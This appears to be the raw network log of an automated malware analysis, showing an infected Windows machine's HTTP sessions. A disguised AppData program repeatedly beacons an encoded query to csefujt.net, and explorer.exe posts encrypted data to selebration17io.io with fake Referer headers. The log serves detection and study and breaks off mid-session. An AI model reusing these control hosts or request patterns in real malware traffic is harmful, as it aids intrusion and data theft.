Feb 5, 2024 12:14:10.754626036 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.6 | 49811 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:11.151633978 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:11.394143105 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.6 | 49812 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:11.788120031 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:12.025204897 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:12.158334970 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:12.406018019 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.6 | 49813 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:12.741733074 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:12.980798006 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.6 | 49814 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:13.327491999 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:13.573385000 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.6 | 49815 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:13.926932096 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:14.168108940 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.6 | 49816 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:14.052932024 CET | 283 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fejbifbnqes.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 351
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:14.052994967 CET | 351 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fb e9 26 fc
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO&>;b<6>Ag5Ka5o4K;*mDd0!0s}:e}5rt|>fX{*,-]o#B9$UoG2"x%'pG
Feb 5, 2024 12:14:14.325778961 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.6 | 49817 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:14.518063068 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:14.755007029 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:14.877481937 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:15.120498896 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.6 | 49818 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:15.467427015 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:15.706836939 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:15.830215931 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:16.067214966 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.191704035 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.437174082 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.6 | 49819 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:16.944181919 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:17.185250998 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.6 | 49820 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:17.531131983 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:17.767784119 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.6 | 49821 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:18.102613926 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:18.349021912 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.6 | 49822 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:18.544980049 CET | 285 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ofbjqsuaveuwo.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 117
Host: selebration17io.io
Feb 5, 2024 12:14:18.545032978 CET | 117 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 92 b1 30 b1
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO0"n$?ZA7cGC
Feb 5, 2024 12:14:18.802834034 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.6 | 49823 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:18.744510889 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:18.983836889 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Feb 5, 2024 12:14:19.111022949 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:19.358594894 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.6 | 49824 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:19.696500063 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:19.932946920 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.6 | 49825 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:20.273667097 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:20.516032934 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                84192.168.2.649826185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.847456932 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
